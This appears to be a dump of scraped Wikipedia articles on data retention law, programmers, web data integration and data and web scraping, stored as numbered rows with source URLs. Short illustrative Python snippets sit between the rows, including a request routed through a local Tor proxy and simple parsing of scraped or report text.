Constitutional Court of Germany ruled the law unconstitutional as a violation of the guarantee of the secrecy of correspondence. 37 On 16 October 2015, a second law for shorter, up to 10 weeks long, data retention excluding email communication was passed by parliament. 38 39 40 However, this act was ruled incompatible with German and European laws by an injunction of the Higher Administrative Court of North Rhine-Westphalia. As a result, on June 28, 2017, three days before the planned start of data retention, the Federal Network Agency suspended the introduction of data retention until a final decision in the principle proceedings. 41 In July 2005 new legal requirements 42 on data retention came into force in Italy. Italy already required the retention of telephony traffic data for 48 months, but without location data. Italy has adopted the EU Directive on Privacy and Electronic Communications 2002 but with an exemption to the requirement to erase traffic data. The directive was transposed into law by Law 32 2008. 
43 In December 2017, D3 Defesa dos Direitos Digitais, a Portuguese digital rights organization, presented a complaint to the Justice Ombudsman, based on the case law of the Court of Justice of the European Union, 44 45 following several opinions of the Portuguese Data Protection Authority. In January 2019, the Ombudsman issued an official recommendation to the Justice Ministry, 46 defending the need to change the national law, in order to comply with the CJEU case law. Some weeks later, in March, the Ombudsman received an answer by the Minister of Justice, where the Minister refused changes to the law. 47 As such, in August 2019, the Ombudsman decided to ask the Portuguese Constitutional Court for a ruling on the constitutionality of the law. 48 In 2022, the Portuguese Constitutional Court published its decision, 49 striking down Law 32 2008 as unconstitutional. Among other things, the Court considered that an undifferentiated and generalized obligation to store all traffic and location data relating to all people did not respect the proportionality principle. 50 In response to this decision, the parliament created a data retention working party, which studied the subject for more than a year and held several hearings with experts. In 2023, a law proposal was approved in the parliament. 51 However, the President of the Republic decided to make use of its prerogative of asking the Constitutional Court for a preventive rule, before approving the law. In this ruling, the Constitutional Court once again decided against the proposed data retention regime, 52 for similar reasons, as the law still required indiscriminate and general data retention of traffic and location data. The diploma was returned to the Parliament and did not become law. In 2024, the Parliament approved a new law proposal. 53 This time, the President of the Republic opted for not requesting a preventive rule from the Constitutional Court, and so the law was published and entered into force. 54 The digital rights association D3 Defesa dos Direitos Digitais maintains that the current law is still a violation of fundamental rights, as it delegates core elements of a fundamental rights restriction to a special formation of the Supreme Court. This makes it impossible to demonstrate the required proportionality of the restriction, or to demonstrate how the data retention regime preserves the essential core of the restricted fundamental rights, as it must. 55 The EU directive has been transposed into Romanian law as well, initially as Law 298 2008. 56 However, the Constitutional Court of Romania subsequently struck down the law in 2009 as violating constitutional rights. 57 The court held that the transposing act violated the constitutional rights of privacy, of confidentiality in communications, and of free speech. 58 The European Commission has subsequently sued Romania in 2011 for non-implementation, threatening Romania with a fine of 30,000 euros per day. 59 The Romanian parliament passed a new law in 2012, which was signed by president Traian B sescu in June. 60 The Law 82 2012 has been nicknamed "Big Brother" (using the untranslated English expression) by various Romanian non-governmental organizations opposing it. 59 61 62 On July 8, 2014, this law too was declared unconstitutional by the Constitutional Court of Romania. 63 Slovakia has implemented the directive in Act No. 610 2003 Coll. on electronic communications as later amended. 
Telecommunication data are stored for six months in the case of data related to Internet, Internet email and Internet telephony (art. 59a (6) a), and for 12 months in the case of other types of communication (art. 59a (6) b). In April 2014, the Slovak Constitutional Court preliminary suspended effectiveness of the Slovak implementation of Data Retention Directive and accepted the case for the further review. 64 65 In April 2015 Constitutional court decided that some parts of Slovak laws implementing DR Directive are not in compliance with Slovak constitution and Convention for the Protection of Human Rights and Fundamental Freedoms. 66 According to now invalid provisions of the Electronic Communications Act, the providers of electronic communications were obliged to store traffic data, localization data and data about the communicating parties for a period of 6 months (in the case Internet, email or VoIP communication) or for a period of 12 months (in case of other communication). 67 Sweden implemented the EU's 2006 Data Retention Directive in May 2012, and it was fined 3 million by the Court of Justice of the European Union for its belated transposition (the deadline was 15 September 2007). 68 69 70 71 The directive allowed member states to determine the duration data is retained, ranging from six months to two years; the Riksdag, Sweden's legislature, opted for six months. 72 In April 2014, however, the CJEU struck down the Data Retention Directive. Following the judgement, PTS, Sweden's telecommunications regulator, told Swedish ISPs and telcos that they would no longer have to retain call records and internet metadata. 73 The Swedish government initiated a one-man investigation that stated that Sweden could keep on with data-retention. After that, the PTS reversed course. 74 Most of Sweden's major telecommunications companies complied immediately, though Tele2 appealed this order before the Administrative Court in Stockholm claiming that the Swedish implementation should be reversed following the directive being declared unvalid, including the fact that the Swedish implementation went further than the directive, including registration of failed telephone calls and the geographic endpoint of a mobile communications. The appeal was rejected. The one holdout ISP, Bahnhof, was given an order to comply by November 24 deadline or face a five million krona ($680,000) fine. 75 Tele2 appealed the first level court rejection to the Swedish Administrative Court of Appeal, that sent the matter to the European Court of Justice of the European Union. That led to a judgement that once again invalidated blanket data retention of all communications of all citizens' communications to combat crime. See under European Union above. The Data Retention and Investigatory Powers Act came into force in 2014. It is the answer by the United Kingdom parliament after a declaration of invalidity was made by the Court of Justice of the European Union in relation to Directive 2006 24 EC in order to make provision, about the retention of certain communications data. 76 In addition, the purpose of the act is to: The act is also to ensure that communication companies in the UK retain communications data so that it continues to be available when it is needed by law enforcement agencies and others to investigate committed crimes and protect the public. 77 Data protection law requires data that isn't of use to be deleted. 
This means that the intention of this Act could be using data retention to acquire further policing powers using, as the Act make data retention mandatory. An element of this Act is the provision of the investigatory powers to be reported by 1 May 2015. 78 The Data Retention and Investigatory Powers Act 2014 was referred to as the "snooper's charter" communications data bill. 79 Theresa May, a strong supporter of the Parliament Act, said in a speech that "If we (parliament) do not act, we risk sleepwalking into a society in which crime can no longer be investigated and terrorists can plot their murderous schemes undisrupted. 79 The United Kingdom parliament its new laws increasing the power of data retention is essential to tackling crime and protecting the public. However, not all agree and believe that the primary objective in the data retention by the government is mass surveillance. After Europe's highest court said the depth of data retention breaches citizens' fundamental right to privacy and the UK created its own Act, it has led to the British government being accused of breaking the law by forcing telecoms and internet providers to retain records of phone calls, texts and internet usage. 80 From this information, governments can identify an individual's associates, location, group memberships, political affiliations and other personal information. In a television interview, the EU Advocate General Pedro Cruz Villal n highlighted the risk that the retained data might be used illegally in ways that are "potentially detrimental to privacy or, more broadly, fraudulent or even malicious". 80 The bodies that are able to access retained data in the United Kingdom are listed in the Regulation of Investigatory Powers Act 2000 (RIPA). These are the following: However, the Regulation of Investigatory Powers Act 2000 (RIPA) also gives the Home Secretary powers to change the list of bodies with access to retained data through secondary legislation. The list of authorised bodies now includes: 84 The justifications for accessing retained data in the UK are set out in the Regulation of Investigatory Powers Act 2000 (RIPA). They include: The EU's Data Retention Directive has been implemented into Norwegian law in 2011, 85 but this will not be in effect before 1 January 2015. 86 A 2016 anti-terrorist federal law 374 FZ known as Yarovaya Law requires all telecommunication providers to store phone call, text and email metadata, as well as the actual voice recordings for up to 6 months. Messaging services like WhatsApp are required to provide cryptographic backdoors to law-enforcement. 87 The law has been widely criticized both in Russia and abroad as an infringement of human rights and a waste of resources. 88 89 90 91 On 29 June 2010, the Serbian parliament adopted the Law on Electronic Communications, according to which the operator must keep the data on electronic communications for 12 months. This provision was criticized as unconstitutional by opposition parties and by Ombudsman Sa a Jankovi . 92 As from 7 July 2016, the Swiss Federal Law about the Surveillance of the Post and Telecommunications entered into force, passed by the Swiss government on 18 March 2016. 93 Swiss mobile phone operators have to retain the following data for six months according to the B PF: All Internet service providers must retain the following data for six months: Email application refers to SMTP , POP3 , IMAP4, webmail- and remail-server. 
94 Switzerland only applies data retention to the largest Internet service providers with over 100 million CHF in annual Swiss-sourced revenue. This notably exempts derived communications providers such as ProtonMail, a popular encrypted email service based in Switzerland. 95 The National Security Agency (NSA) commonly records Internet metadata for the whole planet for up to a year in its MARINA database, where it is used for pattern-of-life analysis. U.S. persons are not exempt because metadata are not considered data under US law (section 702 of the FISA Amendments Act). 96 Its equivalent for phone records is MAINWAY. 97 The NSA records SMS and similar text messages worldwide through DISHFIRE. 98 Various United States agencies leverage the (voluntary) data retention practised by many U.S. commercial organizations through programs such as PRISM and MUSCULAR. Amazon is known to retain extensive data on customer transactions. Google is also known to retain data on searches, and other transactions. If a company is based in the United States the Federal Bureau of Investigation (FBI) can obtain access to such information by means of a National Security Letter (NSL). The Electronic Frontier Foundation states that "NSLs are secret subpoenas issued directly by the FBI without any judicial oversight. These secret subpoenas allow the FBI to demand that online service providers or ecommerce companies produce records of their customers' transactions. The FBI can issue NSLs for information about people who haven't committed any crimes. NSLs are practically immune to judicial review. They are accompanied by gag orders that allow no exception for talking to lawyers and provide no effective opportunity for the recipients to challenge them in court. This secret subpoena authority, which was expanded by the controversial USA PATRIOT Act, could be applied to nearly any online service provider for practically any type of record, without a court ever knowing". The Washington Post has published a well researched article on the FBI's use of National Security Letters. 99 The United States does not have any Internet Service Provider (ISP) mandatory data retention laws similar to the European Data Retention Directive, 100 which was retroactively invalidated in 2014 by the Court of Justice of the European Union. Some attempts to create mandatory retention legislation have failed: While it is often argued that data retention is necessary to combat terrorism and other crimes, there are still others who oppose data retention. Data retention may assist the police and security services to identify potential terrorists and their accomplices before or after an attack has taken place. For example, the authorities in Spain and the United Kingdom stated that retained telephony data made a significant contribution to police enquires into the 2004 Madrid train bombings and the 2005 London bombings. 106 The opponents of data retention make the following arguments: The current directive proposal (see above) would force ISPs to record the internet communications of its users. The basic assumption is that this information can be used to identify with whom someone, whether innocent citizen or terrorist, communicated throughout a specific timespan. Believing that such as mandate would be useful is ignoring that some very committed community of crypto professionals has been preparing for such legislation for decades. 
Below are some strategies available today to anyone to protect themselves, avoid such traces, and render such expensive and legally dubious logging operations useless. There are anonymizing proxies that provide slightly more private web access. Proxies must use HTTPS encryption in order to provide any level of protection at all. Unfortunately, proxies require the user to place a large amount of trust in the proxy operator (since they see everything the user does over HTTP), and may be subject to traffic analysis. Some P2P services like file transfer or voice over IP use other computers to allow communication between computers behind firewalls. This means that trying to follow a call between two citizens might, mistakenly, identify a third citizen unaware of the communication. For security conscious citizens with some basic technical knowledge, tools like I2P The Anonymous Network, Tor, Mixmaster and the cryptography options integrated into any many modern mail clients can be employed. I2P is an international peer-to-peer anonymizing network, which aims at not only evading data retention, but also at making spying by other parties impossible. The structure is similar to the one TOR (see next paragraph) uses, but there are substantial differences. It protects better against traffic analysis and offers strong anonymity and for net-internal traffic end-to-end encryption. Due to unidirectional tunnels it is less prone to timing attacks than Tor. In I2P, several services are available: anonymous browsing, anonymous e-mails, anonymous instant messenger, anonymous file-sharing, and anonymous hosting of websites, among others. Tor is a project of the U.S. non-profit Tor Project 112 to develop and improve an onion routing network to shield its users from traffic analysis. Mixmaster is a remailer service that allows anonymous email sending. JAP is a project very similar to Tor. It is designed to route web requests through several proxies to hide the end user's Internet address. Tor support has been included into JAP. The Arbeitskreis Vorratsdatenspeicherung (German Working Group on Data Retention) is an association of civil rights campaigners, data protection activists and Internet users. The Arbeitskreis coordinates the campaign against the introduction of data retention in Germany. 113 An analysis of federal Crime Agency (BKA) statistics published on 27 January 2010 by civil liberties NGO AK Vorrat revealed that data retention did not make a prosecution of serious crime any more effective. 114 As the EU Commission is currently considering changes to the controversial EU data retention directive, a coalition of more than 100 civil liberties, data protection and human rights associations, jurists, trade unions and others are urging the commission to propose the repeal of the EU requirements regarding data retention in favour of a system of expedited preservation and targeted collection of traffic data. 114 |
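As a concrete illustration of the onion-routing option, ordinary HTTP requests can be sent through a locally running Tor client's SOCKS port. This sketch assumes Tor is already listening on its default port 9050 and that SOCKS support for requests is installed (pip install requests[socks]).

import requests

# socks5h resolves DNS inside Tor as well, so lookups do not leak locally.
TOR_PROXIES = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

def get_via_tor(url):
    response = requests.get(url, proxies=TOR_PROXIES, timeout=30)
    response.raise_for_status()
    return response.text

if __name__ == "__main__":
    # Should print a Tor exit node's address rather than your own.
    print("IP seen by the server:", get_via_tor("https://ifconfig.me").strip())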
619 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:All_articles_containing_potentially_dated_statements | Articles in category contain all recorded statements that may become dated. The statements may need to be updated, removed or edited for perspective. Articles containing older statements are more likely to be dated. This is not a backlog; not all articles included in this category will need updating at this point in time. See also Category:Articles containing potentially dated statements which contains potentially dated statements ordered by originating date. Use As of to mark all individual statements that may become dated, this will automatically add them to the appropriate categories. Wherever possible, use Update after to mark exactly when statements will need updating in addition to using As of . So that articles don't remain in this category too long, a suggestion is made to work on articles beginning with a certain letter. The letter is changed daily. The current focus is on articles beginning with: N. The following 200 pages are in this category, out of approximately 78,001 total. This list may not reflect recent changes. |
620 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Programmers | A programmer, computer programmer or coder is an author of computer source code someone with skill in computer programming. The professional titles software developer and software engineer are used for jobs that require a programmer. Generally, a programmer writes code in a computer language and with an intent to build software that achieves some goal. Sometimes a programmer or job position is identified by the language used or target platform. For example, assembly programmer, web developer. The job titles that include programming tasks have differing connotations across the computer industry and to different individuals. The following are notable descriptions. A software developer primarily implements software based on specifications and fixes bugs. Other duties may include reviewing code changes and testing. To achieve the required skills for the job, they might obtain a computer science or associate degree, attend a programming boot camp or be self-taught. A software engineer usually is responsible for the same tasks as a developer plus broader responsibilities of software engineering including architecting and designing new features and applications, targeting new platforms, managing the software development lifecycle (design, implementation, testing, and deployment), leading a team of programmers, communicating with customers, managers and other engineers, considering system stability and quality, and exploring software development methodologies. Sometimes, a software engineer is required to have a degree in software engineering, computer engineering, or computer science. Some countries legally require an engineering degree to be called engineer. 1 2 3 British countess and mathematician Ada Lovelace is often considered to be the first computer programmer. She authored an algorithm, which was published in October 1842, for calculating Bernoulli numbers on the Charles Babbage analytical engine. 4 Because the machine was not completed in her lifetime, she never experienced the algorithm in action. In 1941, German civil engineer Konrad Zuse was the first person to execute a program on a working, program-controlled, electronic computer. 5 From 1943 to 1945, per computer scientist Wolfgang K. Giloi and AI professor Ra l Rojas et al., Zuse created the first, high-level programming language, Plankalk l. 6 7 Members of the 1945 ENIAC programming team of Kay McNulty, Betty Jennings, Betty Snyder, Marlyn Wescoff, Fran Bilas and Ruth Lichterman have since been credited as the first professional computer programmers. 8 9 The first company founded specifically to provide software products and services was the Computer Usage Company in 1955. Before that time, computers were programmed either by customers or the few commercial computer manufacturers of the time, such as Sperry Rand and IBM. 10 The software industry expanded in the early 1960s, almost immediately after computers were first sold in mass-produced quantities. Universities, governments, and businesses created a demand for software. Many of these programs were written in-house by full-time staff programmers; some were distributed between users of a particular machine for no charge, while others were sold on a commercial basis. Other firms, such as Computer Sciences Corporation (founded in 1959), also started to grow. 
Computer manufacturers soon started bundling operating systems, system software and programming environments with their machines; the IBM 1620 came with the 1620 Symbolic Programming System and FORTRAN. 11 The industry expanded greatly with the rise of the personal computer (PC) in the mid 1970s, which brought computing to the average office worker. In the following years, the PC also helped create a constantly growing market for games, applications and utility software. This resulted in increased demand for software developers for that period of time. 12 Computer programmers write, test, debug, and maintain the detailed instructions, called computer programs, that computers must follow to perform their functions. Programmers also conceive, design, and test logical structures for solving problems by computer. Many technical innovations in programming — advanced computing technologies and sophisticated new languages and programming tools — have redefined the role of a programmer and elevated much of the programming work done today. Job titles and descriptions may vary, depending on the organization. 13 Programmers work in many settings, including corporate information technology (IT) departments, big software companies, small service firms and government entities of all sizes. Many professional programmers also work for consulting companies at client sites as contractors. Licensing is not typically required to work as a programmer, although professional certifications are commonly held by programmers. 13 Programming is considered a profession. 14 15 16 Programmers' work varies widely depending on the type of business for which they are writing programs. For example, the instructions involved in updating financial records are very different from those required to duplicate conditions on an aircraft for pilots training in a flight simulator. Simple programs can be written in a few hours. More complex ones may require more than a year of work, while others are never considered 'complete' but rather are continuously improved as long as they stay in use. In most cases, several programmers work together as a team under a senior programmer's supervision. citation needed Programming editors, also known as source code editors, are text editors that are specifically designed for programmers or developers to write the source code of an application or a program. Most of these editors include features useful for programmers, which may include color syntax highlighting, auto indentation, auto-complete, bracket matching, syntax check, and allows plug-ins. These features aid the users during coding, debugging and testing. 17 According to BBC News, 17% of computer science students could not find work in their field six months after graduation in 2009 which was the highest rate of the university subjects surveyed while 0% of medical students were unemployed in the same survey. 18 After the crash of the dot-com bubble (1999 2001) and the Great Recession (2008), many U.S. programmers were left without work or with lower wages. 19 20 In addition, enrollment in computer-related degrees and other STEM degrees (STEM attrition) 21 in the US has been dropping for years, especially for women, 22 which, according to Beaubouef and Mason, 23 could be attributed to a lack of general interest in science and mathematics and also out of an apparent fear that programming will be subject to the same pressures as manufacturing and agriculture careers. For programmers, the U.S. 
Bureau of Labor Statistics (BLS) Occupational Outlook originally predicted a growth for programmers of 12 percent from 2010 to 2020 24 and thereafter a decline of 7 percent from 2016 to 2026, a further decline of 9 percent from 2019 to 2029, a decline of 10 percent from 2021 to 2031. 13 and then a decline of 11 percent from 2022 to 2032. 25 Since computer programming can be done from anywhere in the world, companies sometimes hire programmers in countries where wages are lower. 13 However, for software developers BLS projects for 2019 to 2029 a 22% increase in employment, from 1,469,200 to 1,785,200 jobs with a median base salary of $110,000 per year. This prediction is lower than the earlier 2010 to 2020 predicted increase of 30% for software developers. 26 27 20 Though the distinction is somewhat ambiguous, software developers engage in a wider array of aspects of application development and are generally higher skilled than programmers, making outsourcing less of a risk. 28 29 Another reason for the decline for programmers is their skills are being merged with other professions, such as developers, as employers increase the requirements for a position over time. Then there is the additional concern that recent advances in artificial intelligence might impact the demand for future generations of Software professions. 30 31 32 33 34 35 36 |
621 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_data_integration | Web data integration (WDI) is the process of aggregating and managing data from different websites into a single, homogeneous workflow. This process includes data access, transformation, mapping, quality assurance and fusion of data. Data that is sourced and structured from websites is referred to as "web data". WDI is an extension and specialization of data integration that views the web as a collection of heterogeneous databases. Data integration techniques in the context of the web form the foundation for businesses taking advantage of data available on the ever-increasing number of publicly accessible websites. 1 Corporate spending on this area amounted to about USD 2.5bn in 2017, and it was expected that by 2020 the market would reach almost USD 7bn. 2 Web data integration extends and specializes data integration to see the web as a collection of views of databases accessible over the web protocols, including, but not limited to: 3 WDI poses technical challenges beyond those of ordinary data integration because the web data sources to be accessed and transformed are often unstructured or semi-structured and lack a standard query mechanism. Understanding the quality and veracity of data is even more important in WDI than in data integration, as the data is generally less implicitly trusted and of lower quality than data collected from a trusted source. There are attempts to automate a trust rating for web data. 4 Data quality checks in data integration can generally happen after data access and transformation, but in WDI quality may need to be monitored as data is collected, due to both the time and the cost of re-collecting the data. 5 WDI has applications in many fields, including bioinformatics, 6 search engines, 7 price comparison, 8 forensic search, 9 data analysis, business intelligence, ecommerce, 10 healthcare, pharmaceutical 11 and product development. Most price comparison engines and recommendation systems use user-generated data to create recommendations for their users. Similarly, healthcare systems use the results of competitions conducted on websites like Kaggle 12 to assess the accuracy of data and to create user-focused products. In fact, IBM estimates that poor-quality WDI is costing companies over $3 trillion 13 in revenue each year. |
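The access, transformation, mapping, quality-assurance and fusion steps can be sketched with pandas. The two small record sets below are made-up stand-ins for scraper output from two sites with different schemas.

import pandas as pd

# Made-up output from two hypothetical sites with different field names.
site_a = pd.DataFrame([
    {"product": "Widget", "price_usd": "19.99", "seller": "A-Mart"},
    {"product": "Gadget", "price_usd": None, "seller": "A-Mart"},
])
site_b = pd.DataFrame([
    {"item_name": "Widget", "cost": 18.50, "store": "B-Shop"},
])

# Mapping: rename each source's columns onto a shared schema.
common_a = site_a.rename(columns={"product": "name", "price_usd": "price", "seller": "source"})
common_b = site_b.rename(columns={"item_name": "name", "cost": "price", "store": "source"})

# Fusion and transformation: combine the sources and coerce prices to numbers.
fused = pd.concat([common_a, common_b], ignore_index=True)
fused["price"] = pd.to_numeric(fused["price"], errors="coerce")

# Quality assurance: flag records that arrived without a usable price.
print(fused)
print("records missing a price:", int(fused["price"].isna().sum()))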
622 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-8 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
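A minimal sketch of data scraping in this narrow sense: the human-readable output of another program (here an invented inventory report) is parsed into structured records with a regular expression, while headers and decorative rules are ignored.

import re
import pandas as pd

# Made-up report text standing in for output captured from another program.
REPORT = """\
INVENTORY REPORT                          PAGE 1
------------------------------------------------
ITEM        QTY    UNIT PRICE
Widget       12        $19.99
Gadget        3        $45.00
------------------------------------------------
END OF REPORT
"""

# Match only the data lines: a word, a quantity, and a dollar amount.
LINE_PATTERN = re.compile(
    r"^(?P<item>[A-Za-z]+)\s+(?P<qty>\d+)\s+\$(?P<price>\d+\.\d{2})\s*$",
    re.MULTILINE,
)

rows = [match.groupdict() for match in LINE_PATTERN.finditer(REPORT)]
inventory = pd.DataFrame(rows).astype({"qty": int, "price": float})
print(inventory)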
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
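The "page shredding" conversion described above, turning fixed-width character data from a display back into numbers, can be sketched as follows. The screen buffer is a made-up stand-in for a captured quote page.

# Three 40-column display lines standing in for a captured terminal screen.
SCREEN_LINES = [
    f"{'SYMBOL':<10}{'LAST':>10}{'CHANGE':>10}{'VOLUME':>10}",
    f"{'ACME':<10}{102.50:>10.2f}{1.25:>+10.2f}{48300:>10d}",
    f"{'GLOBEX':<10}{87.10:>10.2f}{-0.40:>+10.2f}{12900:>10d}",
]

# Column layout of the display: (start, end, field name).
FIELDS = [(0, 10, "symbol"), (10, 20, "last"), (20, 30, "change"), (30, 40, "volume")]

def shred_screen(lines):
    """Slice fixed-width screen lines into typed records, skipping the header row."""
    records = []
    for line in lines[1:]:
        raw = {name: line[start:end].strip() for start, end, name in FIELDS}
        records.append({
            "symbol": raw["symbol"],
            "last": float(raw["last"]),
            "change": float(raw["change"]),
            "volume": int(raw["volume"]),
        })
    return records

for record in shred_screen(SCREEN_LINES):
    print(record)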
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
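The entry above describes report mining: extracting fields from a human-readable report rather than from a live system. Below is a minimal sketch of that idea using only libraries already loaded in this notebook (re, pandas). The report format, field names, and values are invented for illustration; they do not come from any real system.

# Report-mining sketch: pull labelled fields out of a hypothetical plain-text
# report with a regular expression and load them into a DataFrame for offline
# analysis, mirroring the spool-file workflow described above.
import re
import pandas as pd

sample_report = """\
DAILY SALES REPORT
INV-1001  2024-01-15  $1,250.00
INV-1002  2024-01-15  $310.50
END OF REPORT
"""

row_pattern = re.compile(r"(INV-\d+)\s+(\d{4}-\d{2}-\d{2})\s+\$([\d,]+\.\d{2})")
rows = [
    {"invoice": m.group(1),
     "date": m.group(2),
     "amount": float(m.group(3).replace(",", ""))}   # strip thousands separator
    for m in row_pattern.finditer(sample_report)
]
report_df = pd.DataFrame(rows)
print(report_df)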
623 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Text_pattern_matching | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
